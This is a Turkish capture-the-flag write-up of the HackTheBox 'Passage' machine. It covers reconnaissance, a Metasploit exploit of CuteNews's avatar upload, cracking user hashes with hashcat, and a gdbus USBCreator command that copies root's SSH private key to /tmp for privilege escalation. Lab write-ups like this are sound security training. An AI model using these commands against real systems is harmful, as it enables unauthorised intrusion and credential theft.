Makine Adı: Passage
Zorluk: Orta
OS: Linux
Öncelikle hackthebox'ın bize verdigi ipyi
Kod:
sudo nano /etc/hosts
ardından iplerin tanımlandığı kısıma
Kod:
10.10.10.206 passage.htb
yapıştırıyoruz.
hızlıca nmap taraması yaparak açık portları öğreniyoruz
Kod:
sudo nmap -vv -A passage.htb
http ve ssh portları açık tarayacıya passage.htb yazarak sayfaya ulaşalım
en alt kısımda "Powered by CuteNews" yazısından yola çıkarak internette bilgi toplamak için "CuteNews" aramasını yapıyoruz
CuteNews'in login urlin http://passage.htb/CuteNews şeklinde olduğunu tespit ediyoruz.
bu dizine gittiğimizde en alt kısımdan CuteNews versiyonunu da öğreniyoruz
Register diyip hemen kayıt oluyoruz.Kayır olduktan sonra bizi şu şekilde bir sayfa karşılıyor=
Personal Options diyerek profil ayarlarına giriyoruz.
Kod:
searchsploit cutenews
yazarak exploit araması yapıyoruz
ardından
Kod:
msfconsole
ile ****sploiti çalıştırarak bu exploitin var olup olmadığına bakıyoruz.
az önceki fotoğrafta gösterdiğim yerdeki profil fotoğrafı değiştirme bölümünde uzaktan erişim için kapı açabileceğimiz bir exploit bulduk. Gerekli ayarları yaptıktan sonra exploiti çalıştırıyoruz.
içeriye erişim sağladık fakat herhangi bir user değiliz.
kullanıcıları görüntüleybilmek icin
Kod:
cd /home
yazarak var olan kullanıcıları görüntülüyoruz
1.Nadav
2.Paul
içerde dizinleri araştırırken sitenin atl dizinlerinde ilginç bir şey ile karşılaşıyoruz
dizin=
Kod:
/var/www/html/CuteNews/cdata/users
burada farklı hashlerin bulunduğunu görüyoruz. buradaki hashleri hashcat aracı ve rackyou worlistini kullanarak
Kod:
hashcat -m 1400 <hash.txt dizini> -w rockyou.txt
kodu ile kırıyoruz
paul:atl*******
(hackthebox paylaşmayı yasakladığı için yıldızlamak zorundayım)
ardından
Kod:
su paul
artık içerde var olan user.txt dosyasını okuyabilir ve hackthebox a yollayabiliriz.
ardından daha güzel bir terminal için ~/.ssh dizinindeki id_rsa yı indirerek ssh portu üzerinden giriş yapıyoruz.
Kod:
ssh -i id_rsa [email protected]
erişim sağladıktan sonra çalışmakta olan işlemleri görüntüleyebilmek için
Kod:
ps aux
root üzerinde birden fazla gdbus hizmetinin çalıştığını görüyoruz.
Tekrar bir internet araştırmasından sonra daha önce yapılmış olan işlemlerin bir açık sayesinde /tmp de görebilir hale geliyoruz
Kod:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/pwn true
ardından
Kod:
cd /tmp
ile tmp klasörüne girip oluşturduğumuz pwn dosyasını okuyabiliriz.
Kod:
cat pwn
burada bulunan id_rsa ı indirip root olarak giriş yapıyoruz
root.txt dosyasını okuyup hacktheboxa gönderiyoruz
Not = bu yazdığım ilk writeup dı bu yüzden bir hatam olduysa kusuruma bakmayın.
Herkese iyi çalışmalar